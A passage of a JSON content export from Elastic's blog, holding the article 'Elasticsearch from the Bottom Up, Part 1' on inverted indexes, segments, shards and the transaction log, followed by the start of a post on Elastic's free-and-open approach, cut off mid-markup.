s_blt57a423112de8a853","created_at":"2019-03-25T13:21:49.326Z","updated_at":"2019-03-25T13:21:49.326Z","content_type":"image/png","file_size":"139110","filename":"elastic-apm-distributed-tracing-small.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-18T14:04:23.929Z","user":"sys_blt57a423112de8a853"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1463e5e2ef1cadd0/5c98d5ed12edfac256db3cd9/elastic-apm-distributed-tracing-small.png"},"title":"Distributed Tracing, OpenTracing and Elastic APM","title_l10n":"Distributed Tracing, OpenTracing and Elastic APM","updated_at":"2024-10-24T08:05:32.941Z","updated_by":"blt3e52848e0cb3c394","url":"/blog/distributed-tracing-opentracing-and-elastic-apm","publish_details":{"time":"2024-10-24T08:16:35.173Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt83e5a8c1a8ff8a04","_version":6,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blt553467a41584839d"],"body_l10n":"\u003cp\u003e\u003cstrong\u003eUPDATE:\u003c/strong\u003e This article refers to our hosted Elasticsearch offering by an older name, Found. Please note that Found is now known as Elastic Cloud.\u003c/p\u003e\n\u003cp\u003eIn this article series, we look at Elasticsearch from a new perspective. We'll start at the \"bottom\" (or close enough!) of the many abstraction levels, and gradually move upwards towards the user-visible layers, studying the various internal data structures and behaviours as we ascend.\u003c/p\u003e\n\u003csection id=\"introduction\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#introduction\"\u003eIntroduction\u003c/a\u003e\u003c/h2\u003e\n \u003cdiv class=\"hide\"\u003eIn this article series, we look at Elasticsearch from a new perspective. We'll start at the \"bottom\" (or close enough!) of the many abstraction levels, and gradually move upwards towards the user-visible layers, studying the various internal data structures and behaviours as we ascend.\u003c/div\u003e\n \u003cp\u003eThe motivation is to get a better understanding of how Elasticsearch, Lucene and to some extent search engines in general actually work under the hood. While you can drive a car by turning a wheel and stepping on some pedals, highly competent drivers typically understand at least some of the mechanics of the vehicle. The same is true for search engines. Elasticsearch provides APIs that are very easy to use, and it will get you started and take you far without much effort. However, to get the most of it, it helps to have some knowledge about the underlying algorithms and data structures. This understanding enables you to make full use of its substantial set of features such that you can improve your users search experiences, while at the same time keep your systems performant, reliable and updated in (near) real time.\u003c/p\u003e\n \u003cp\u003eWe will start with the basic index structure, the \u003cem\u003einverted index\u003c/em\u003e. It is a very versatile data structure. At the same time it's also easy to use and understand. That said, Lucene's implementation is a highly optimized, impressive feat of engineering. We will not venture into Lucene's implementation details, but rather stick to how the inverted index is used and built. That is what influences how we can search and index.\u003c/p\u003e\n \u003cp\u003eHaving introduced the inverted index as the \"bottom\" of the abstraction levels, we'll look into:\u003c/p\u003e\n \u003cul\u003e\n \u003cli\u003eHow simple searches are performed.\u003c/li\u003e\n \u003cli\u003eWhat types of searches can (and cannot) effectively be done, and why, with an inverted index, we transform problems until they look like string-prefix problems.\u003c/li\u003e\n \u003cli\u003eWhy text processing is important.\u003c/li\u003e\n \u003cli\u003eHow indexes are built in \"segments\" and how that affects searching and updating.\u003c/li\u003e\n \u003cli\u003eWhat constitutes a Lucene-index.\u003c/li\u003e\n \u003cli\u003eThe Elasticsearch shard and index.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cp\u003eAt that point, we'll know a lot about what happens inside a single Elasticsearch node when searching as well as indexing. The second article in the series will cover the distributed aspects of Elasticsearch.\u003c/p\u003e\n\u003c/section\u003e\n\u003csection id=\"inverted-indexes-and-index-terms\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#inverted-indexes-and-index-terms\"\u003eInverted Indexes and Index Terms\u003c/a\u003e\u003c/h2\u003e\n \u003cfigure\u003e\n \u003cdiv data-img-caption-container=\"true\" style=\"display: inline-block; text-align: center;\"\u003e\u003cimg src=\"https://api.contentstack.io/v2/assets/575e4c8943e9adc538713a84/download?uid=bltb03758c3e981d9e4?uid=bltb03758c3e981d9e4\" data-sys-asset-uid=\"blta41df18d587cc481\" /\u003e\n \u003cfigcaption style=\"text-align: center;\" style=\"text-align: center;\"\u003eSample documents and resulting inverted index\u003c/figcaption\u003e\n \u003c/div\u003e\n \u003c/figure\u003e\n \u003cp\u003eLet's say we have these three simple documents: \"Winter is coming.\", \"Ours is the fury.\" and \"The choice is yours.\". After some simple text processing (lowercasing, removing punctuation and splitting words), we can construct the \"inverted index\" shown in the figure.\u003c/p\u003e\n \u003cp\u003eThe inverted index maps \u003cem\u003eterms\u003c/em\u003e to documents (and possibly positions in the documents) containing the term. Since the terms in the \u003cem\u003edictionary\u003c/em\u003e are sorted, we can quickly find a term, and subsequently its occurrences in the \u003cem\u003epostings\u003c/em\u003e-structure. This is contrary to a \"forward index\", which lists terms related to a specific document.\u003c/p\u003e\n \u003cp\u003eA simple search with multiple terms is then done by looking up all the terms and their occurrences, and take the intersection (for AND searches) or the union (for OR searches) of the sets of occurrences to get the resulting list of documents. More complex types of queries are obviously more elaborate, but the approach is the same: first, operate on the dictionary to find candidate terms, then on the corresponding occurrences, positions, etc.\u003c/p\u003e\n \u003cp\u003eConsequently, an \u003cem\u003eindex term\u003c/em\u003e is the \u003cem\u003eunit of search\u003c/em\u003e. The terms we generate dictate what types of searches we can (and cannot) efficiently do. For example, with the dictionary in the figure above, we can efficiently find all terms that \u003cem\u003estart\u003c/em\u003e with a \"c\". However, we cannot efficiently perform a search on everything that \u003cem\u003econtains\u003c/em\u003e \"ours\". To do so, we would have to traverse \u003cem\u003eall\u003c/em\u003e the terms, to find that \"yours\" also contains the substring. This is prohibitively expensive when the index is not trivially small. In terms of complexity, looking up terms by their prefix is \u003cspan class=\"math\"\u003e\\(\\mathcal{O}\\left(\\mathrm{log}\\left(n\\right)\\right)\\)\u003c/span\u003e, while finding terms by an arbitrary substring is \u003cspan class=\"math\"\u003e\\(\\mathcal{O}\\left(n\\right)\\)\u003c/span\u003e.\u003c/p\u003e\n \u003cp\u003eIn other words, we can efficiently find things given term \u003cem\u003eprefixes\u003c/em\u003e. When all we have is an inverted index, we want everything to look like a string prefix problem. Here are a few examples of such transformations. Some are simple, the last one is bordering on magic.\u003c/p\u003e\n \u003cul\u003e\n \u003cli\u003eTo find everything \u003cem\u003eending\u003c/em\u003e with \"tastic\", we can index the \u003cem\u003ereverse\u003c/em\u003e (e.g. \"fantastic\" → \"citsatnaf\") and search for everything starting with \"citsat\".\u003c/li\u003e\n \u003cli\u003eFinding substrings often involves splitting terms into smaller terms called \"n-grams\". For example, \"yours\" can be split into \"^yo\", \"you\", \"our\", \"urs\", \"rs$\", which means we would get occurrences of \"ours\" by searching for \"our\" and \"urs\".\u003c/li\u003e\n \u003cli\u003eFor languages with compound words, like Norwegian and German, we need to \"decompound\" words like \"Donaudampfschiff\" into e.g. {\"donau\", \"dampf\", \"schiff\"} in order to find it when searching for \"schiff\".\u003c/li\u003e\n \u003cli\u003eGeographical coordinate points such as (60.6384, 6.5017) can be converted into \"geo hashes\", in this case \"u4u8gyykk\". The longer the string, the greater the precision.\u003c/li\u003e\n \u003cli\u003eTo enable phonetic matching, which is very useful for people's names for instance, there are algorithms like \u003ca href=\"http://en.wikipedia.org/wiki/Metaphone\"\u003eMetaphone\u003c/a\u003e that convert \"Smith\" to {\"SM0\", \"XMT\"} and \"Schmidt\" to {\"XMT\", \"SMT\"}.\u003c/li\u003e\n \u003cli\u003eWhen dealing with numeric data (and timestamps), Lucene automatically generates several terms with different precision in a trie-like fashion, so range searches can be done efficiently\u003cspan class=\"citation\" data-cites=\"lucene-docs\"\u003e\u003ca href=\"#fn1\" class=\"footnoteRef\" id=\"fnref1\"\u003e\u003csup\u003e1\u003c/sup\u003e\u003c/a\u003e\u003c/span\u003e. Simplified, the number 123 can be stored as \"1\"-hundreds, \"12\"-tens and \"123\". Hence, searching for everything in the range [100, 199] is therefore everything matching the \"1\"-hundreds-term. This is different to searching for everything starting with \"1\", of course, as that would also include \"1234\", and so on.\u003c/li\u003e\n \u003cli\u003eTo do \"Did you mean?\" type searches and find spellings that are close to the input, a \"Levenshtein\" automaton can be built to effectively traverse the dictionary. This is exceptionally complex, here's a fascinating story on \u003ca href=\"http://blog.mikemccandless.com/2011/03/lucenes-fuzzyquery-is-100-times-faster.html\"\u003ehow it ended up in Lucene\u003c/a\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cp\u003eA technical deep dive into text-processing is food for many future articles, but we have highlighted \u003cem\u003ewhy\u003c/em\u003e it is important to be meticulous about index term generation: to get searches that can be performed efficiently.\u003c/p\u003e\n\u003c/section\u003e\n\u003csection id=\"building-indexes\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#building-indexes\"\u003eBuilding Indexes\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eWhen building inverted indexes, there's a few things we need to prioritize: search speed, index compactness, indexing speed and the time it takes for new changes to become visible.\u003c/p\u003e\n \u003cp\u003eSearch speed and index compactness are related: when searching over a smaller index, less data needs to be processed, and more of it will fit in memory. Both, particularly compactness, come at the cost of indexing speed, as we'll see.\u003c/p\u003e\n \u003cp\u003eTo minimize index sizes, various compression techniques are used. For example, when storing the postings (which can get quite large), Lucene does tricks like delta-encoding (e.g., [42, 100, 666] is stored as [42, 58, 566] ), using variable number of bytes (so small numbers can be saved with a single byte), and so on.\u003c/p\u003e\n \u003cp\u003eKeeping the data structures small and compact means sacrificing the possibility to efficiently update them. In fact, Lucene does not update them at all: the index files Lucene write are \u003cem\u003eimmutable\u003c/em\u003e, i.e. they are \u003cem\u003enever\u003c/em\u003e updated. This is quite different to B-trees, for instance, which can be updated and often lets you specify a fill factor to indicate how much updating you expect.\u003c/p\u003e\n \u003cp\u003eThe exception is deletions. When you delete a document from an index, the document is \u003cem\u003emarked\u003c/em\u003e as such in a special deletion file, which is actually just a bitmap which is cheap to update. The index structures themselves are \u003cem\u003enot\u003c/em\u003e updated.\u003c/p\u003e\n \u003cp\u003eConsequently, updating a previously indexed document is a delete followed by a re-insertion of the document. Note that this means that updating a document is even more expensive than adding it in the first place. Thus, storing things like rapidly changing counters in a Lucene index is usually not a good idea – there is no in-place update of values.\u003c/p\u003e\n \u003cp\u003eWhen new documents are added (perhaps via an update), the index changes are first buffered in memory. Eventually, the index files in their entirety, are \u003cem\u003eflushed\u003c/em\u003e to disk. Note that this is the Lucene-meaning of \"flush\". Elasticsearch's flush operation involves a Lucene commit and more, covered in \u003ca href=\"#translog\"\u003ethe transaction log-section\u003c/a\u003e.\u003c/p\u003e\n \u003cp\u003eWhen to flush can depend on various factors: how quickly changes must be visible, the memory available for buffering, I/O saturation, etc. Generally, for indexing speed, larger buffers are better, as long as they are small enough that your I/O can keep up. We go a bit more into detail in the next section.\u003c/p\u003e\n \u003cp\u003eThe written files make up an index \u003cem\u003esegment\u003c/em\u003e.\u003c/p\u003e\n\u003c/section\u003e\n\u003csection id=\"index-segments\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#index-segments\"\u003eIndex Segments\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eA Lucene index is made up of one or more immutable index segments, which essentially is a \"mini-index\". When you do a search, Lucene does the search on every segment, filters out any deletions, and merges the results from all the segments. Obviously, this gets more and more tedious as the number of segments grows. To keep the number of segments manageable, Lucene occasionally \u003cem\u003emerges\u003c/em\u003e segments according to some merge policy as new segments are added. Lucene-hacker Michael McCandless has a great post explaining and \u003ca href=\"http://blog.mikemccandless.com/2011/02/visualizing-lucenes-segment-merges.html\"\u003evisualizing segment merging\u003c/a\u003e.\u003cspan class=\"citation\" data-cites=\"lucene-segment-merging\"\u003e\u003ca href=\"#fn3\" class=\"footnoteRef\" id=\"fnref3\"\u003e\u003csup\u003e3\u003c/sup\u003e\u003c/a\u003e\u003c/span\u003e When segments are merged, documents marked as deleted are finally discarded. This is why adding more documents can actually result in a smaller index size: it can trigger a merge.\u003c/p\u003e\n \u003cp\u003eElasticsearch and Lucene generally do a good job of handling when to merge segments. Elasticsearch's policies can be tweaked by configuring \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/2.3/index-modules.html#index-modules-settings\"\u003emerge settings\u003c/a\u003e. You can also use the \u003ca href=\"/guide/reference/api/admin-indices-optimize\"\u003eoptimize API\u003c/a\u003e to force merges.\u003c/p\u003e\n \u003cp\u003eBefore segments are flushed to disk, changes are buffered in memory. In the old days (Lucene \u0026lt;2.3), every added document actually existed as its own tiny segment\u003cspan class=\"citation\" data-cites=\"busch-rt2010\"\u003e\u003ca href=\"#fn4\" class=\"footnoteRef\" id=\"fnref4\"\u003e\u003csup\u003e4\u003c/sup\u003e\u003c/a\u003e\u003c/span\u003e, and all were merged on flush. Nowadays, there is a DocumentsWriter, which can make larger in-memory segments from a batch of documents. With Lucene 4, there can now be one of these per thread, increasing indexing performance by allowing for concurrent flushing. (Earlier, indexing would have to wait for a flush to complete.)\u003c/p\u003e\n \u003cp\u003eAs new segments are created (either due to a flush or a merge), they also cause certain caches to be invalidated, which can negatively impact search performance. Caches like the field and filter caches are \u003cem\u003eper segment\u003c/em\u003e. Elasticsearch has a \u003ca href=\"/guide/reference/api/admin-indices-warmers\"\u003ewarmer-API\u003c/a\u003e\u003cspan class=\"citation\" data-cites=\"elasticsearch-guide\"\u003e\u003ca href=\"#fn5\" class=\"footnoteRef\" id=\"fnref5\"\u003e\u003csup\u003e5\u003c/sup\u003e\u003c/a\u003e\u003c/span\u003e, so the necessary caches can be \"warmed\" before the new segment is made available for search.\u003c/p\u003e\n \u003cp\u003eThe most common cause for flushes with Elasticsearch is probably the continuous index refreshing, which by default happens once every second. As new segments are flushed, they become available for searching, enabling (near) real-time search. While a flush is not as expensive as a commit (as it does not need to wait for a confirmed write), it does cause a new segment to be created, invalidating some caches, and possibly triggering a merge.\u003c/p\u003e\n \u003cp\u003eWhen indexing throughput is important, e.g. when batch (re-)indexing, it is not very productive to spend a lot of time flushing and merging small segments. Therefore, in these cases it is usually a good idea to temporarily increase the refresh_interval-setting, or even disable automatic refreshing altogether. One can always refresh manually, and/or when indexing is done.\u003c/p\u003e\n\u003c/section\u003e\n\u003csection id=\"elasticsearch-indexes\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#elasticsearch-indexes\"\u003eElasticsearch Indexes\u003c/a\u003e\u003c/h2\u003e\n \u003cblockquote\u003e\"All problems in computer science can be solved by another level of indirection.\" – David J. Wheeler\u003c/blockquote\u003e\n \u003cp\u003eAn Elasticsearch index is made up of one or more shards, which can have zero or more replicas. These are all individual Lucene indexes. That is, an Elasticsearch index is made up of many Lucene indexes, which in turn is made up of index segments. When you search an Elasticsearch index, the search is executed on all the shards - and in turn, all the segments - and merged. The same is true when you search multiple Elasticsearch indexes. Actually, searching two Elasticsearch indexes with one shard each is pretty much the same as searching one index with two shards. In both cases, two underlying Lucene indexes are searched.\u003c/p\u003e\n \u003cp\u003eFrom this point onwards in this article, when we refer to an \"index\" by itself, we mean an Elasticsearch index.\u003c/p\u003e\n \u003cp\u003eA \"shard\" is the basic scaling unit for Elasticsearch. As documents are added to the index, it is routed to a shard. By default, this is done in a round-robin fashion, based on the hash of the document's id. In the second part of this series, we will look more into how shards are moved around. It is important to know, however, that the number of shards is specified at index creation time, and cannot be changed later on. An early presentation on Elasticsearch by Shay has excellent coverage of why a shard is actually a complete Lucene index, and its various benefits and tradeoffs compared to other methods.\u003c/p\u003e\n \u003cp\u003eWhich Elasticsearch indexes, and what shards (and replicas) search requests are sent to, can be customized in many ways. By combining index patterns, index aliases, and document and search routing, lots of different partitioning and data flow strategies can be implemented. We will not go into them here, but we can recommend Zachary Tong's article on \u003ca href=\"/blog/customizing-your-document-routing\"\u003ecustomizing document routing\u003c/a\u003e and Shay Banon's presentation on \u003ca href=\"/videos/big-data-search-and-analytics\"\u003ebig data, search and analytics\u003c/a\u003e. Just to give you some ideas, here are some examples:\u003c/p\u003e\n \u003cul\u003e\n \u003cli\u003eLots of data is time based, e.g. logs, tweets, etc. By creating an index per day (or week, month, …), we can efficiently limit searches to certain time ranges - and expunge old data. Remember, we cannot efficiently delete from an existing index, but deleting an entire index is cheap.\u003c/li\u003e\n \u003cli\u003eWhen searches must be limited to a certain user (e.g. \"search your messages\"), it can be useful to route all the documents for that user to the same shard, to reduce the number of indexes that must be searched.\u003c/li\u003e\n \u003c/ul\u003e\n\u003c/section\u003e\n\u003csection id=\"translog\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#translog\"\u003eTransactions\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eWhile Lucene has a concept of transactions, Elasticsearch does not. All operations in Elasticsearch add to the same timeline, which is not necessarily entirely consistent across nodes, as the flushing is reliant on timing.\u003c/p\u003e\n \u003cp\u003eManaging the isolation and visibility of different segments, caches and so on across indexes across nodes in a distributed system is \u003cem\u003every\u003c/em\u003e hard. Instead of trying to do this, it prioritizes being fast.\u003c/p\u003e\n \u003cp\u003eElasticsearch has a \"transaction log\" where documents to be indexed are appended. Appending to a log file is a lot cheaper than building segments, so Elasticsearch can write the documents to index somewhere durable - in addition to the in-memory buffer, which is lost on crashes. You can also specify the consistency level required when you index. For example, you can require every replica to have indexed the document before the index operation returns.\u003c/p\u003e\n\u003c/section\u003e\n\u003csection id=\"summary\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#summary\"\u003eSummary\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eTo summarize, these are the important properties to be aware of when it comes to how Lucene builds, updates and searches indexes on a single node:\u003c/p\u003e\n \u003cul\u003e\n \u003cli\u003eHow we process the text we index dictates how we can search. Proper text analysis is important.\u003c/li\u003e\n \u003cli\u003eIndexes are built first in-memory, then occasionally flushed in \u003cem\u003esegments\u003c/em\u003e to disk.\u003c/li\u003e\n \u003cli\u003eIndex segments are immutable. Deleted documents are \u003cem\u003emarked\u003c/em\u003e as such.\u003c/li\u003e\n \u003cli\u003eAn index is made up of multiple segments. A search is done on every segment, with the results merged.\u003c/li\u003e\n \u003cli\u003eSegments are occasionally merged.\u003c/li\u003e\n \u003cli\u003eField and filter caches are per segment.\u003c/li\u003e\n \u003cli\u003eElasticsearch does not have transactions.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cp\u003eIn the next article in this series, we'll look at how search and indexing is done across a cluster. In the meantime, \u003ca href=\"https://www.elastic.co/webinars/getting-started-elasticsearch\" target=\"_self\"\u003e\u003cspan\u003ewatch our on-demand webinar and get started with Elasticsearch.\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\n \u003cdiv class=\"references\"\u003e\n \u003ch2\u003e\u003ca href=\"#references\"\u003eReferences\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eBusch, Michael: \u003cem\u003eRealtime search with lucene\u003c/em\u003e – \u003ca href=\"http://2010.berlinbuzzwords.de/sites/2010.berlinbuzzwords.de/files/busch_bbuzz2010.pdf\"\u003ehttp://2010.berlinbuzzwords.de/sites/2010.berlinbuzzwords.de/files/busch_bbuzz2010.pdf\u003c/a\u003e\u003c/p\u003e\n \u003cp\u003eElasticsearch: \u003cem\u003eGuide\u003c/em\u003e – \u003ca href=\"/guide\"\u003ehttps://www.elastic.co/guide\u003c/a\u003e\u003c/p\u003e\n \u003cp\u003e\u003cem\u003eLucene aPI documentation\u003c/em\u003e – \u003ca href=\"http://lucene.apache.org/core/4_4_0/core/overview-summary.html\"\u003ehttp://lucene.apache.org/core/4_4_0/core/overview-summary.html\u003c/a\u003e\u003c/p\u003e\n \u003cp\u003eMcCandless, Michael: \u003cem\u003eVisualizing lucene's segment merges\u003c/em\u003e, 2011 – \u003ca href=\"http://blog.mikemccandless.com/2011/02/visualizing-lucenes-segment-merges.html\"\u003ehttp://blog.mikemccandless.com/2011/02/visualizing-lucenes-segment-merges.html\u003c/a\u003e\u003c/p\u003e\n \u003c/div\u003e\n\u003c/section\u003e\n\u003csection class=\"footnotes\"\u003e\n \u003chr /\u003e\n \u003col\u003e\n \u003cli id=\"fn1\"\u003e\u003cem\u003eLucene aPI documentation\u003c/em\u003e – \u003ca href=\"http://lucene.apache.org/core/4_4_0/core/overview-summary.html\"\u003ehttp://lucene.apache.org/core/4_4_0/core/overview-summary.html\u003c/a\u003e, \u003ca href=\"http://lucene.apache.org/core/4_4_0/core/org/apache/lucene/search/NumericRangeQuery.html\"\u003eNumericRangeQuery\u003c/a\u003e.\u003ca href=\"#fnref1\"\u003e↩\u003c/a\u003e\u003c/li\u003e\n \u003cli id=\"fn3\"\u003eMichael McCandless, \u003cem\u003eVisualizing lucene's segment merges\u003c/em\u003e, 2011 – \u003ca href=\"http://blog.mikemccandless.com/2011/02/visualizing-lucenes-segment-merges.html\"\u003ehttp://blog.mikemccandless.com/2011/02/visualizing-lucenes-segment-merges.html\u003c/a\u003e.\u003ca href=\"#fnref3\"\u003e↩\u003c/a\u003e\u003c/li\u003e\n \u003cli id=\"fn4\"\u003eMichael Busch, \u003cem\u003eRealtime search with lucene\u003c/em\u003e – \u003ca href=\"http://2010.berlinbuzzwords.de/sites/2010.berlinbuzzwords.de/files/busch_bbuzz2010.pdf\"\u003ehttp://2010.berlinbuzzwords.de/sites/2010.berlinbuzzwords.de/files/busch_bbuzz2010.pdf\u003c/a\u003e.\u003ca href=\"#fnref4\"\u003e↩\u003c/a\u003e\u003c/li\u003e\n \u003cli id=\"fn5\"\u003eElasticsearch, \u003cem\u003eGuide\u003c/em\u003e – \u003ca href=\"/guide\"\u003ehttps://www.elastic.co/guide\u003c/a\u003e, \u003ca href=\"/guide/reference/api/admin-indices-warmers\"\u003ewarmer-API\u003c/a\u003e.\u003ca href=\"#fnref5\"\u003e↩\u003c/a\u003e\u003c/li\u003e\n \u003c/ol\u003e\n\u003c/section\u003e","callout":[],"category":[{"uid":"bltb79594af7c5b4199","_version":3,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:05.640Z","created_by":"blt3044324473ef223b70bc674c","key":"product","label_l10n":"Product","tags":[],"title":"Product","updated_at":"2024-05-10T13:44:20.209Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.527Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T13:52:11.713Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":null,"markdown_l10n":"","publish_date":"2013-09-16T18:57:03.000Z","seo":{"seo_title_l10n":"","seo_description_l10n":"In this article series, we look at Elasticsearch from a new perspective. We'll start at the 'bottom' (or close enough!) of the many abstraction levels, and gradually move upwards towards the user-visible layers, studying the various internal data structures and behaviours as we ascend.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt0e7c39f65cbd3755","ACL":{},"created_at":"2023-11-06T20:37:20.943Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"data-ingestion","label_l10n":"Data ingestion","tags":[],"title":"Data ingestion","updated_at":"2023-11-06T20:37:20.943Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.173Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":null,"title":"Elasticsearch from the Bottom Up, Part 1","title_l10n":"Elasticsearch from the Bottom Up, Part 1","updated_at":"2024-10-21T18:39:35.074Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/found-elasticsearch-from-the-bottom-up","publish_details":{"time":"2024-10-21T18:39:47.384Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt0a7019bed923c61a","_version":49,"locale":"en-us","ACL":{},"abstract_l10n":"From the very beginning, the Elastic (ELK) Stack — Elasticsearch, Logstash, Beats, and Kibana — has been free and open.","author":["blta88061c105b8011d"],"body_l10n":"\u003cp\u003eFrom the very beginning, the Elastic Stack — Elasticsearch, Kibana, Beats, and Logstash — has been free and open. Our approach is not only to make our technology stack available for free, but to make it open — housed in public repositories and developed through a transparent approach with direct involvement from the community.\u0026nbsp;\u003c/p\u003e\u003cp\u003eTwo simple principles — free and open — broke down barriers and enabled many amazing things.\u003c/p\u003e\u003ch3\u003eVibrant community\u0026nbsp;\u003c/h3\u003e\u003cp\u003eCombine great technology with free distribution and open development\u0026nbsp;and you get a vibrant community of doers. Free lowers barriers to adoption, and open\u003cstrong\u003e \u003c/strong\u003edevelopment fosters collaboration, contribution, and creativity.\u003c/p\u003e\u003cp\u003eAnyone in the world can download the Elastic Stack and get started immediately — whether they choose to run it on a laptop to develop a new search-powered application or in a data center to monitor infrastructure and protect against security threats. They can see (and contribute to) the code, \u0026nbsp;share feedback, questions, or requests directly with our engineering team, and engage with their peers in the community. This is a powerful force multiplier.\u0026nbsp;\u003c/p\u003e\u003ch3\u003eBetter products. Newer directions.\u0026nbsp;\u003c/h3\u003e\u003cp\u003eCombine free and open with a creative, passionate, and engaged community, and not only does it make the products better, but the community often blazes the trails that take the products in new and interesting directions. Our community is a source of constant inspiration for us, and is the source of so many of the great ideas that move us forward.\u003c/p\u003e\u003cp\u003eIn the early days of Elasticsearch, the ingenuity of the community gave rise to Logstash, Kibana, and Beats. Together, Elasticsearch, Logstash, and Kibana became the ELK Stack (now Elastic Stack) and sowed the seeds of a new use case (logging). And now we have a dedicated Observability solution. Then security practitioners took notice and started using the ELK Stack to power their security analytics, and now we have a free and open SIEM. This has continued all these years with community-created and -inspired features, extensions, plugins, and use cases.\u003c/p\u003e\u003ch3\u003eFree and open is in our DNA\u0026nbsp;\u003c/h3\u003e\u003cp\u003eFree and open principles are ingrained into who we are and how we progress. We want our products to be used to learn, to develop, and\u0026nbsp;to be run in production at scale. And that’s why many of our core features, products, and solutions are free. For example:\u003c/p\u003e\u003cp\u003e\u003ca href=\"/what-is/elastic-stack-security\"\u003e\u003cstrong\u003eFree security features\u003c/strong\u003e\u003c/a\u003e developed natively in the stack\u0026nbsp;are critical to ensure that every cluster is protected. But we go far beyond that, providing role-based access control and true multitenancy for Kibana, all for free. We believe that products developed in the open are more secure.\u0026nbsp;\u003c/p\u003e\u003cp\u003e\u003ca href=\"/what-is/kibana-lens\"\u003e\u003cstrong\u003eKibana Lens\u003c/strong\u003e\u003c/a\u003e\u003cstrong\u003e,\u003c/strong\u003e for example, which we introduced as a beta in the 7.5 release of the Elastic Stack, made it even easier to visualize data stored in Elasticsearch. It channeled a lot of the community feedback we saw on the Kibana repo over the years.\u0026nbsp;\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0ea7bdf603fb6318/5f8a0bb4f6c586323f8b3d9b/blog-elastic-free-open-1.gif\" width=\"617\" height=\"350\" style=\"width: 617px; height: 350px;\"/\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"/maps\"\u003e\u003cstrong\u003eElastic Maps,\u003c/strong\u003e\u003c/a\u003e which we made generally available in version 7.3 of the Elastic Stack, opened up new ways to visually explore location data in Elasticsearch. This was based\u0026nbsp;on a lot of geo work done in Elasticsearch.\u0026nbsp;\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdf19428aa0eeba13/5f8a0c10dcf0e74b7cbf6f1d/blog-elastic-free-open-2.gif\" width=\"625.1259259259259\" height=\"352\" style=\"width: 625.1259259259259px; height: 352px;\"/\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"/what-is/kibana-canvas\"\u003e\u003cstrong\u003eCanvas\u003c/strong\u003e\u003c/a\u003e, which became generally available in 6.5, lets you turn your Elasticsearch data into dynamic presentation style dashboards, and bring your unique style to how you tell the story of your data.\u0026nbsp;\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd3bcb6c0c16af459/5c3047b6e71ce40c6e4ad94b/airport4-upd.gif\"/\u003e\u003cbr /\u003e\u003c/p\u003e\u003cp\u003eWe’ve even applied this open philosophy to develop turnkey solutions that solve our users’ key challenges. Each of these solutions has components that are built out in the open, and anyone can get started for free.\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"/enterprise-search\"\u003e\u003cstrong\u003eElastic Enterprise Search\u003c/strong\u003e\u003c/a\u003e makes it possible to implement powerful, modern search experiences complemented by free and open developer tools.\u003c/li\u003e\u003cli\u003e\u003ca 